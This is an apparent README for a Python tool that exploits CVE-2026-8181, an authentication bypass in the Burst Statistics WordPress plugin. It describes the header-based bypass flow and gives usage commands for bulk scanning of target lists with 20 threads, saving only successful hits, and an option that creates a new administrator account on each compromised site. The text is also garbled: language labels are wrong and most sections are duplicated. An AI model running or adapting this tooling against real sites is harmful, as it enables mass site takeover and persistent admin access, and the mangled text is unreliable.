
CVE-2026-8181 PoC: Burst Statistics (3.4.0–3.4.1.1) authentication bypass. Python tool — single & multi-target scans, threaded workers, TXT reports. Authorized testing only. Maintainer: mürrez.
EN: Контролируемый PoC и краткие технические заметки для авторизованного тестирования безопасности обхода аутентификации в Burst Statistics.
TR: Контролируемый PoC и краткое техническое резюме для авторизованного тестирования безопасности обхода аутентификации в плагине Burst Statistics.
Примечание: Цифра 200 000+ активных установок на WordPress.org — это вся пользовательская база плагина; это не означает, что каждый сайт работает на уязвимой версии. Реальное влияние требует проверки версии + окружения (доступность HTTP / пароля приложения и т.д.).
Примечание: Цифра 200 000+ активных установок на WordPress.org — это вся пользовательская база плагина; это не означает, что все сайты работают на уязвимой версии. Реальное влияние требует проверки версии + окружения (доступность HTTP, пароля приложения и т.д.).
GitHub-flavored Markdown не встраивает двоичные GIF без файла в репозитории. Фрагменты Typing SVG выше (CDN) имитируют движение. Чтобы добавить собственный скриншот:

GitHub Markdown не поддерживает встраивание GIF без файла в репозитории. Текстовые анимации Typing SVG выше (CDN) дают эффект движения. Для собственной демонстрации:

flowchart LR
A[Client request] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Mis-handled branch| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: full admin context]
flowchart LR
A[İstek] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Yanlış dal| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: tam admin bağlamı]
С -f опции -o и --output-dir являются взаимоисключающими.
В режиме -f опции -o и --output-dir не могут использоваться одновременно.
pip3 install requests urllib3
# Single site, report file
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k
# Single site + new admin (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k
# Bulk + combined file (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k
# Bulk + per-host files in folder (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
# Одиночный сайт, файл отчёта
python3 CVE-2026-8181.py -u http://lab.local -U admin -o otchet.txt -k
# Одиночный сайт + новый администратор (лаборатория)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o otchet.txt -k
# Массовое сканирование + объединённый файл (только успехи)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o uspeh.txt -k
# Массовое сканирование + файлы на хост в папке (только успехи)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
Password: field / Пустое поле Password:Успешный обход не раскрывает реальный пароль целевого пользователя — пароль Basic в PoC фиктивный. Строка Password: остаётся пустой, если только --create-user не создал новую учётную запись (тогда в неё записывается сгенерированный пароль).
Успешный обход не раскрывает реальный пароль целевого пользователя — пароль Basic в PoC фиктивный. Строка Password: остаётся пустой, если только --create-user не создал новую учётную запись (тогда в неё записывается сгенерированный пароль).
Только для проверок с письменного разрешения и собственной лаборатории. Несанкционированное использование незаконно во многих юрисдикциях. Авторы и сопровождающий этого README не несут ответственности за неправильное использование.
Только для проверок с письменного разрешения и собственной лаборатории. Несанкционированное использование незаконно во многих странах. Авторы и сопровождающий этого README не несут ответственности за неправильное использование.
| Поле | Детали |
|---|
| Что | Обход аутентификации (CWE-287) в Burst Statistics: специальные заголовки могут повышать REST-запросы до полного контекста администратора. |
| Версии | Уязвимы: 3.4.0, 3.4.1, 3.4.1.1 · Используйте: 3.4.2 или новее |
| Серьёзность | CVSS ~9.8 (Critical); удалённо, без аутентификации при подходящих условиях. |
| Этот репозиторий | CVE-2026-8181.py — лабораторная автоматизация: одиночная цель, массовый список, пул потоков, выборочный TXT-вывод. |
| Поле | Детали |
|---|
| Что | Обход аутентификации (CWE-287) в Burst Statistics. Специальные заголовки могут повышать REST-запросы до полного контекста администратора. |
| Версии | Уязвимы: 3.4.0, 3.4.1, 3.4.1.1 · Рекомендуется: 3.4.2 и выше |
| Серьёзность | CVSS ~9.8 (Critical); удалённо, без аутентификации при подходящих условиях. |
| Этот репозиторий | CVE-2026-8181.py — лабораторная автоматизация: одиночная цель, массовое сканирование, пул потоков, выборочный TXT-вывод. |
| Функция | Описание |
|---|
| Одиночная цель | -u базовый URL |
| Массовые цели | -f targets.txt (по одному URL на строку; # комментарии) |
| Параллельность | -j N рабочих потоков (с ограничением) |
| Общий файл | -o file.txt — с -f добавляются только успешные эксплойты |
| Файлы на хост | --output-dir — только успехи получают host.txt (неудачи пропускаются) |
| Новый админ | --create-user — случайный пользователь через REST (пароль затем отображается в отчёте) |
| TLS (лаборатория) | -k отключает проверку сертификата (только доверенные лаборатории) |
| Функция | Описание |
|---|
| Одиночная цель | -u корневой адрес |
| Массовые цели | -f targets.txt (по одному URL на строку; # комментарий) |
| Параллельность | -j N рабочих потоков (с ограничением) |
| Общий файл | -o dosya.txt — с -f добавляются только успешные эксплойты |
| Файлы на хост | --output-dir — только успехи получают host.txt (неудачи пропускаются) |
| Новый админ | --create-user — случайный пользователь через REST (пароль затем в отчёте) |
| TLS (лаборатория) | -k отключает проверку сертификата (только доверенные лаборатории) |